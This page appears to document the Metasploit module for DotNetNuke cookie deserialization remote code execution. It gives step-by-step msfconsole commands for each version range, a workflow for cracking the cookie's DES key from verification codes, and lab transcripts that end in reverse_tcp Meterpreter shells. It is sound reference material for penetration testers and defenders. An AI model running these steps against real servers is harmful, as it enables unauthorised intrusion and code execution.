DotNetNuke Cookie Deserialization Remote Code Excecution - Metasploit


This page contains detailed information about how to use the exploit/windows/http/dnn_cookie_deserialization_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: DotNetNuke Cookie Deserialization Remote Code Excecution
Module: exploit/windows/http/dnn_cookie_deserialization_rce
Source code: modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb
Disclosure date: 2017-07-20
Last modification time: 2022-03-10 10:28:25 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2017-9822, CVE-2018-15811, CVE-2018-15812, CVE-2018-18325, CVE-2018-18326

This module exploits a deserialization vulnerability in DotNetNuke (DNN) versions 5.0.0 to 9.3.0-RC. Vulnerable versions store profile information for users in the DNNPersonalization cookie as XML. The expected structure includes a "type" attribute to instruct the server which type of object to create on deserialization. The cookie is processed by the application whenever it attempts to load the current user's profile data. This occurs when DNN is configured to handle 404 errors with its built-in error page (default configuration). An attacker can leverage this vulnerability to execute arbitrary code on the system.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Basic Usage


msf > use exploit/windows/http/dnn_cookie_deserialization_rce
msf exploit(dnn_cookie_deserialization_rce) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


This module exploits a deserialization vulnerability in DotNetNuke (DNN) versions 5.0.0 to 9.3.0-RC. Vulnerable versions store profile information for users in the DNNPersonalization cookie as XML.

The expected structure includes a "type" attribute to instruct the server which type of object to create on deserialization. The cookie is processed by the application whenever it attempts to load the current user's profile data, which occurs when DNN is configured to handle 404 errors with its built-in error page (default configuration). An attacker can leverage this vulnerability to execute arbitrary code on the system.

DNN v5.0.0 - v9.1.0

CVE-2017-9822:

Directly exploitable.

DNN v9.1.1 - v9.2.1

CVE-2018-15811, CVE-2018-15812:

The patch for CVE-2017-9822 used a weak encryption algorithm (DES) and an encryption key of low entropy. Furthermore, if the target site is configured to use Verified Registration, the plaintext value of the registration verification code is exposed on the user profile page. Since the verification code is encrypted using the same algorithm and key as the DNNPersonalization cookie, a known-plaintext attack can be used to recover the key and re-exploit CVE-2017-9822 with an encrypted cookie. In some cases a valid .DOTNETNUKE session token may be required for exploitation (v9.2.0+)

DNN v9.2.2 - v9.3.0-RC

CVE-2018-18325, CVE-2018-18326:

The implemented patch for CVE-2018-15811 and CVE-2018-15812 did not prevent exploitation. The patch changed the encryption key used to encrypt and decrypt the DNNPersonalization cookie; however, this encryption key was still derived from the key used to encrypt and decrypt the registration verification code and the strength of the encryption algorithm was not increased (DES). Additional changes were made to prevent the full plaintext of the verification code from being disclosed. A partial plaintext value was still disclosed on the user profile page. Due to the project being open-source, it was possible to determine the format of the rest of the plaintext verification code. Using a list of obtained verification codes and the known partial plaintext value, it is possible to reduce the number of potential encryption keys through offline processing to a point where trying to re-exploit CVE-2017-9822 with each potential key becomes a feasible attack.

Vulnerable Application


On a Windows machine, download the "Install" package from here:

https://github.com/dnnsoftware/Dnn.Platform/releases/tag/v9.3.0-rc2

Install packages for other versions can be downloaded from:

https://github.com/dnnsoftware/Dnn.Platform/releases/tag/<version number>

Follow the installation instructions here for installing with ATTACHED DATABASE:

https://www.dnnsoftware.com/wiki/how-to-install-dotnetnuke

You will need SQL Server 2005/2008/2008R2/2012 or 2016 installed.

Log in as the super user account and make sure the 404 error page is set to the built-in 404 Error Page. Typically, this is already set as the default setting, but during testing I encountered an edge case where an issue during installation caused this value to be set to "None Specified".

Additionally, if you are testing this module from a machine other than the host that the application is installed on, you will need to configure the Site Alias so that it is accessible using a hostname other than localhost. Additional firewall rules may need to be configured to allow web access, depending on how you set up the applicaiton in IIS.

This module has been tested on DNN v7.0.0 - v9.3.0-RC running on Windows Server 2016.

v5.0.0 - v9.1.0

No additional configuration required.

v9.1.1+

While logged in as the super user account, configure the application to use Verified registration. You will also need to configure the SMTP server settings to be valid in order to receive the registration email.

Verification Steps


v5.0.0 - v9.1.0

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/windows/http/dnn_cookie_deserialization_rce
  4. Do: set RHOST <RHOST>
  5. Do: set RPORT <RPORT>
  6. Do: set PAYLOAD windows/meterpreter/reverse_tcp
  7. Do: set LHOST <LHOST>
  8. Do: set LPORT <LPORT>
  9. Do: check
  10. Verify that you are seeing The target appears to be vulnerable in the console
  11. Do: exploit
  12. Verify that you get a meterpeter shell

v9.1.1

  1. Install the application
  2. Configure the application to use Verified Registration
  3. Configure the application's SMTP server settings so that it will send the registration email
  4. Register a new user account and copy the verification code in the link in the registration email
  5. Log in as the new user and navigate to the Edit Profile page. Note the userId url path parameter value
  6. Examine the page's source code and search for a portalId value that is a positive integer.
  7. Start msfconsole
  8. Do: use exploit/windows/http/dnn_cookie_deserialization_rce
  9. Do: set RHOST <RHOST>
  10. Do: set RPORT <RPORT>
  11. Do: set PAYLOAD windows/meterpreter/reverse_tcp
  12. Do: set LHOST <LHOST>
  13. Do: set LPORT <LPORT>
  14. Do: set VERIFICATION_CODE <Verification Code>
  15. Do: set VERIFICATION_PLAIN <{portalId}-{userId}>
  16. Do: set ENCRYPTED true
  17. Do: check
  18. Verify that you are seeing The target appears to be vulnerable in the console
  19. Do: exploit
  20. Verify that you get a meterpeter shell

v9.2.0 - v9.2.1

  1. Install the application
  2. Configure the application to use Verified Registration
  3. Configure the application's SMTP server settings so that it will send the registration email
  4. Register a new user account and copy the verification code in the link in the registration email
  5. Log in as the new user and navigate to the Edit Profile page. Note the userId url path parameter value
  6. Examine the Edit Profile page's source code and search for a portalId value that is a positive integer.
  7. While logged in, examine your cookies using the browser's developer tools or by other means. Copy the value of the .DOTNETNUKE cookie value.
  8. Start msfconsole
  9. Do: use exploit/windows/http/dnn_cookie_deserialization_rce
  10. Do: set RHOST <RHOST>
  11. Do: set RPORT <RPORT>
  12. Do: set PAYLOAD windows/meterpreter/reverse_tcp
  13. Do: set LHOST <LHOST>
  14. Do: set LPORT <LPORT>
  15. Do: set VERIFICATION_CODE <Verification Code>
  16. Do: set VERIFICATION_PLAIN <{portalId}-{userId}>
  17. Do: set ENCRYPTED true
  18. Do: set SESSION_TOKEN <.DOTNETNUKE cookie value>
  19. Do: check
  20. Verify that you are seeing The target appears to be vulnerable in the console
  21. Do: exploit
  22. Verify that you get a meterpeter shell

v9.2.2 - 9.3.0-RC

In these versions, the userId value was changed to be a randomly generated GUID. This means that only the first part of the verification plaintext is known. By providing a list of several verification codes, it is possible to reduce the nubmer of potential encryption key values to a feasible amount. Once the list of encryption keys has been reduced, the module will test each key until an HTTP callback is received on port 8080 that indicates which key worked. Then, the final exploit payload will be encrypted using the recovered key and sent to the server, resulting in a shell.

  1. Install the application
  2. Configure the application to use Verified Registration
  3. Configure the application's SMTP server settings so that it will send the registration email
  4. Register several new user accounts and note the verification codes in the link in the registration emails
  5. Log in as the new user and navigate to the Edit Profile page.
  6. Examine the Edit Profile page's source code and search for a portalId value that is a positive integer
  7. While logged in, examine your cookies using the browser's developer tools or by other means. Copy the value of the .DOTNETNUKE cookie value.
  8. Start msfconsole
  9. Do: use exploit/windows/http/dnn_cookie_deserialization_rce
  10. Do: set RHOST <RHOST>
  11. Do: set RPORT <RPORT>
  12. Do: set PAYLOAD windows/meterpreter/reverse_tcp
  13. Do: set LHOST <LHOST>
  14. Do: set LPORT <LPORT>
  15. Do: set VERIFICATION_CODE <full path to file containing verification codes>
  16. Do: set VERIFICATION_PLAIN <{portalId}->
  17. Do: set ENCRYPTED true
  18. Do: set SESSION_TOKEN <.DOTNETNUKE cookie value>
  19. Do: set TARGET 4
  20. Do: check
  21. Verify that you are seeing The target appears to be vulnerable in the console.
  22. Do: exploit
  23. Verify that you get a meterpeter shell

Options


DryRun

Set this to true to generate a payload, but not send the exploit to the target server. Default value is false.

ENCRYPTED

Set this to true for targets running v9.1.1+. Default value is false.

IV

The initialization vector to use for encrypting the payload. If specified along with KEY, VERIFICATION_CODE and VERIFICATION_PLAIN options will be ignored.

KEY

The key to use for encryption. If specified along with IV, VERIFICATION_CODE and VERIFICATION_PLAIN options will be ignored.

SESSION_TOKEN

The .DOTNETNUKE session cookie value to use when submitting the payload to the server. Required for targets running v9.2.0+.

SRVPORT

The server port to listen for HTTP callbacks on when testing encryption passphrases for targets running v9.2.2 - v9.3.0-RC. Default value is 8080

TARGETURI

Path to a page that will result in a DNN 404 Error Page. The default location is /__

VERIFICATION_CODE

The verification code received in an email, or the full path to a file containing multiple verification codes.

VERIFICATION_PLAIN

The known (full or partial) plaintext of the encrypted verification code. Typically in the format of {portalID}-{userID} where portalID is an integer and userID is either an integer (v9.1.1 - v9.2.1) or GUID (v9.2.2+).

Scenarios


v5.1.0 - v9.1.0

Here's showing the expected output:

  msf5 > use exploit/windows/http/dnn_cookie_deserialization_rce 
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8083
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > check

  [*] Trying to determine DNN Version...
  [*] Checking version at /Documentation/License.txt ...
  [+] DNN Version Found: v5.1.0 - v9.0.1
  [*] Checking for custom error page at: /__ ...
  [+] Custom error page detected.
  [*] 192.168.31.131:8083 - The target appears to be vulnerable.
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > exploit

  [*] Checking for custom error page at: /__ ...
  [+] Custom error page detected.
  [*] Started reverse TCP handler on 192.168.31.128:443 
  [*] Sending Exploit Payload to: /__ ...
  [*] Sending stage (179779 bytes) to 192.168.31.131
  [*] Meterpreter session 1 opened (192.168.31.128:443 -> 192.168.31.131:49957) at 2019-07-10 14:02:09 -0400

  meterpreter > sysinfo
  Computer        : SERVER_NAME
  OS              : Windows 2016 (Build 14393).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x86/windows
  meterpreter >

v9.1.1

Here's showing the expected output

  msf5 > use exploit/windows/http/dnn_cookie_deserialization_rce 
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8084
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_CODE Amop-0Et1fM_
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_PLAIN 0-2
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set ENCRYPTED true
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > check

  [*] Trying to determine DNN Version...
  [*] Checking version at /Documentation/License.txt ...
  [!] DNN Version Found: v9.0.1 - v9.1.1 - May require ENCRYPTED
  [*] Checking for custom error page at: /__ ...
  [+] Custom error page detected.
  [*] 192.168.31.131:8084 - The target appears to be vulnerable.
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > exploit

  [*] Checking for custom error page at: /__ ...
  [+] Custom error page detected.
  [*] Finding Key...
  [*] Searching at 648742.110 keys/s ...... 68.69% of keyspace complete.
  [+] KEY Found: B2ABB4BB
  [+] IV Found: 11A4D8BE
  [*] Total number of Keys tried: 29568463
  [*] Time to crack: 45.578 seconds
  [*] Started reverse TCP handler on 192.168.31.128:443 
  [*] Sending Exploit Payload to: /__ ...
  [*] Sending stage (179779 bytes) to 192.168.31.131
  [*] Meterpreter session 1 opened (192.168.31.128:443 -> 192.168.31.131:49970) at 2019-07-10 14:46:38 -0400

  meterpreter > sysinfo
  Computer        : SERVER_NAME
  OS              : Windows 2016 (Build 14393).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x86/windows
  meterpreter >

v9.2.0 - v9.2.1

Here's the expected output:

  msf5 > use exploit/windows/http/dnn_cookie_deserialization_rce 
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8085
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_CODE xR9oL8FP2eE_
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_PLAIN 0-3
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set ENCRYPTED true
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set SESSION_TOKEN 20FED393A44F86138D9089074C819880222A494155CEFAC6FEAF2B3B5204A227625654D87EA48ECB1E509664A7E8E32644BD363D3E6FD3A3273B245EF2D10B5E13D7912B
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > check

  [*] Trying to determine DNN Version...
  [*] Checking version at /Documentation/License.txt ...
  [!] DNN Version Found: v9.2.0+ - Requires ENCRYPTED and SESSION_TOKEN. Setting target to 3 (v9.2.0 - v9.2.1). Site may also be 9.2.2 - try setting target 4 and supply a file of of verification codes, or specifiy valid Key and IV values.
  [*] Checking for custom error page at: /__ ...
  [+] Custom error page detected.
  [+] 192.168.31.131:8085 - The target appears to be vulnerable.
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > exploit

  [*] Checking for custom error page at: /__ ...
  [+] Custom error page detected.
  [*] Finding Key...
  [*] Searching at 641992.579 keys/s ...... 1.47% of keyspace complete.
  [+] KEY Found: 022BA242
  [+] IV Found: 0BCF9976
  [*] Total number of Keys tried: 633602
  [*] Time to crack: 0.987 seconds
  [*] Started reverse TCP handler on 192.168.31.128:443 
  [*] Sending Exploit Payload to: /__ ...
  [*] Sending stage (179779 bytes) to 192.168.31.131
  [*] Meterpreter session 1 opened (192.168.31.128:443 -> 192.168.31.131:49971) at 2019-07-10 15:08:04 -0400

  meterpreter > sysinfo
  Computer        : SERVER_NAME
  OS              : Windows 2016 (Build 14393).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x86/windows
  meterpreter >

v9.2.2 - v9.3.0-RC

Here's the expected output:

  msf5 > use exploit/windows/http/dnn_cookie_deserialization_rce 
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8090
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_CODE /dnn930rc_verification_codes.txt
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_PLAIN 0-
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set ENCRYPTED true
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set SESSION_TOKEN 306A9A382E32E420739C589CCD5C44A7C2595A7163D3340DF4AD71D4223AFC6866E823F36C6171F84FD7352E6BEB17D66B9823567557988321A0867C7038FF6B0F5B0C1F943CBBDAC0B2EE3E
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set TARGET 4
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > check

  [*] Checking for custom error page at: /__ ...
  [+] Custom error page detected.
  [+] 192.168.31.131:8090 - The target is vulnerable.
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > exploit

  [*] Checking for custom error page at: /__ ...
  [+] Custom error page detected.
  [*] Finding Key...
  [*] Searching at 420798.449 keys/s ...... 15.24% of keyspace complete.
  [+] Possible Base Key Value Found: 2660A22D
  [*] Total number of Keys tried: 6558182
  [*] Time to crack: 15.585 seconds
  [*] Generated 128 possible base KEY values from 2660A22D
  [!] Finding possible base IVs. This may take a few minutes...
  [*] Found 4 potential Base IV values using 10 verification codes in 42.82 seconds.
  [*] Generated 512 possible base64 KEY and IV combinations.
  [!] Trying all possible KEY and IV combinations...
  [*] Starting HTTP listener on port 8080...
  [*] Using URL: http://192.168.31.128:8080/fCyQGz78
  [!] Sending 512 test Payload(s) to: /__. This may take a few minutes ...
  [*] Trying KEY and IV combination 440 of 512...
  [+] KEY: ByEypXIT and IV: zhKad5QC found
  [*] Started reverse TCP handler on 192.168.31.128:443 
  [*] Sending Exploit Payload to: /__ ...
  [*] Sending stage (179779 bytes) to 192.168.31.131
  [*] Meterpreter session 1 opened (192.168.31.128:443 -> 192.168.31.131:49973) at 2019-07-10 15:39:12 -0400

  meterpreter > sysinfo
  Computer        : SERVER_NAME
  OS              : Windows 2016 (Build 14393).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x86/windows
  meterpreter >

Go back to menu.

Msfconsole Usage


Here is how the windows/http/dnn_cookie_deserialization_rce exploit module looks in the msfconsole:

msf6 > use exploit/windows/http/dnn_cookie_deserialization_rce

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > show info

       Name: DotNetNuke Cookie Deserialization Remote Code Excecution
     Module: exploit/windows/http/dnn_cookie_deserialization_rce
   Platform: Windows
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-07-20

Provided by:
  Jon Park
  Jon Seigel

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   v5.0 - v9.0.0
  2   v9.0.1 - v9.1.1
  3   v9.2.0 - v9.2.1
  4   v9.2.2 - v9.3.0-RC

Check supported:
  Yes

Basic options:
  Name                Current Setting  Required  Description
  ----                ---------------  --------  -----------
  DryRun              false            no        Performs target version check, finds encryption KEY and IV values if required, and outputs a cookie payload
  ENCRYPTED           false            yes       Whether or not to encrypt the final payload cookie;
        (VERIFICATION_CODE and VERIFICATION_PLAIN) or (KEY and IV) are required if set to true.
  IV                                   no        The initialization vector to use for encryption.
  KEY                                  no        The key to use for encryption.
  Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                               yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT               80               yes       The target port (TCP)
  SESSION_TOKEN                        no        The .DOTNETNUKE session cookie to use when submitting the payload to the target server.
        DNN versions 9.2.0+ require the attack to be submitted from an authenticated context.
  SRVPORT             8080             yes       The local port to listen on.
  SSL                 false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                              no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI           /__              yes       The path that will result in the DNN 404 response
  URIPATH                              no        The URI to use for this exploit (default is random)
  VERIFICATION_CODE                    no        The encrypted verification code received in a registration email.
        Can also be the path to a file containing a list of verification codes.
  VERIFICATION_PLAIN                   no        The known (full or partial) plaintext of the encrypted verification code.
        Typically in the format of {portalID}-{userID} where portalID is an integer and userID is either an integer or G
                                                 UID (v9.2.2+)
  VHOST                                no        HTTP server virtual host

Payload information:

Description:
  This module exploits a deserialization vulnerability in DotNetNuke 
  (DNN) versions 5.0.0 to 9.3.0-RC. Vulnerable versions store profile 
  information for users in the DNNPersonalization cookie as XML. The 
  expected structure includes a "type" attribute to instruct the 
  server which type of object to create on deserialization. The cookie 
  is processed by the application whenever it attempts to load the 
  current user's profile data. This occurs when DNN is configured to 
  handle 404 errors with its built-in error page (default 
  configuration). An attacker can leverage this vulnerability to 
  execute arbitrary code on the system.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2017-9822
  https://nvd.nist.gov/vuln/detail/CVE-2018-15811
  https://nvd.nist.gov/vuln/detail/CVE-2018-15812
  https://nvd.nist.gov/vuln/detail/CVE-2018-18325
  https://nvd.nist.gov/vuln/detail/CVE-2018-18326
  https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf
  https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html
  https://github.com/pwntester/ysoserial.net

Module Options


This is a complete list of options available in the windows/http/dnn_cookie_deserialization_rce exploit:

msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > show options

Module options (exploit/windows/http/dnn_cookie_deserialization_rce):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   DryRun              false            no        Performs target version check, finds encryption KEY and IV values if required, and outputs a cookie payload
   ENCRYPTED           false            yes       Whether or not to encrypt the final payload cookie;
        (VERIFICATION_CODE and VERIFICATION_PLAIN) or (KEY and IV) are required if set to true.
   IV                                   no        The initialization vector to use for encryption.
   KEY                                  no        The key to use for encryption.
   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                               yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT               80               yes       The target port (TCP)
   SESSION_TOKEN                        no        The .DOTNETNUKE session cookie to use when submitting the payload to the target server.
        DNN versions 9.2.0+ require the attack to be submitted from an authenticated context.
   SRVPORT             8080             yes       The local port to listen on.
   SSL                 false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                              no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI           /__              yes       The path that will result in the DNN 404 response
   URIPATH                              no        The URI to use for this exploit (default is random)
   VERIFICATION_CODE                    no        The encrypted verification code received in a registration email.
        Can also be the path to a file containing a list of verification codes.
   VERIFICATION_PLAIN                   no        The known (full or partial) plaintext of the encrypted verification code.
        Typically in the format of {portalID}-{userID} where portalID is an integer and userID is either an integer or
                                                  GUID (v9.2.2+)
   VHOST                                no        HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the windows/http/dnn_cookie_deserialization_rce exploit:

msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > show advanced

Module advanced options (exploit/windows/http/dnn_cookie_deserialization_rce):

   Name                                    Current Setting                                     Required  Description
   ----                                    ---------------                                     --------  -----------
   ContextInformationFile                                                                      no        The information file that contains context information
   DOMAIN                                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS                           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler                   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding                   false                                               no        Use transient context when encoding payloads
   FingerprintCheck                        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace                               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors                         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly                    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                                no        The HTTP username to specify for authentication
   ListenerComm                                                                                no        The specific communication channel to use for this service
   Powershell::encode_final_payload        false                                               yes       Encode final payload for -EncodedCommand
   Powershell::encode_inner_payload        false                                               yes       Encode inner payload for -EncodedCommand
   Powershell::exec_in_place               false                                               yes       Produce PSH without executable wrapper
   Powershell::exec_rc4                    false                                               yes       Encrypt PSH with RC4
   Powershell::method                      reflection                                          yes       Payload delivery method (Accepted: net, reflection, old, msil)
   Powershell::no_equals                   false                                               yes       Pad base64 until no "=" remains
   Powershell::noninteractive              true                                                yes       Execute powershell without interaction
   Powershell::persist                     false                                               yes       Run the payload in a loop
   Powershell::prepend_protections_bypass  true                                                yes       Prepend AMSI/SBL bypass
   Powershell::prepend_sleep                                                                   no        Prepend seconds of sleep
   Powershell::remove_comspec              false                                               yes       Produce script calling powershell directly
   Powershell::strip_comments              true                                                yes       Strip comments
   Powershell::strip_whitespace            false                                               yes       Strip whitespace
   Powershell::sub_funcs                   false                                               yes       Substitute function names
   Powershell::sub_vars                    true                                                yes       Substitute variable names
   Powershell::wrap_double_quotes          true                                                yes       Wraps the -Command argument in single quotes
   SSLCipher                                                                                   no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression                          false                                               no        Enable SSL/TLS-level compression
   SSLVersion                              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2
                                                                                                         )
   SendRobots                              false                                               no        Return a robots.txt file if asked for one
   URIHOST                                                                                     no        Host to use in URI (useful for tunnels)
   URIPORT                                                                                     no        Port to use in URI (useful for tunnels)
   UserAgent                               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                                   no        Specify the workspace for this module
   WfsDelay                                5                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (windows/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadBindPort                               no        Port to bind reverse tcp socket to on target system.
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependMigrate               false            yes       Spawns and runs shellcode in new process
   PrependMigrateProc                            no        Process to spawn and run shellcode in
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the windows/http/dnn_cookie_deserialization_rce module can exploit:

msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   v5.0 - v9.0.0
   2   v9.0.1 - v9.1.1
   3   v9.2.0 - v9.2.1
   4   v9.2.2 - v9.3.0-RC

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the windows/http/dnn_cookie_deserialization_rce exploit:

msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > show payloads

Compatible Payloads
===================

   #    Name                                                        Disclosure Date  Rank    Check  Description
   -    ----                                                        ---------------  ----    -----  -----------
   0    payload/generic/custom                                                       normal  No     Custom Payload
   1    payload/generic/debug_trap                                                   normal  No     Generic x86 Debug Trap
   2    payload/generic/shell_bind_tcp                                               normal  No     Generic Command Shell, Bind TCP Inline
   3    payload/generic/shell_reverse_tcp                                            normal  No     Generic Command Shell, Reverse TCP Inline
   4    payload/generic/tight_loop                                                   normal  No     Generic x86 Tight Loop
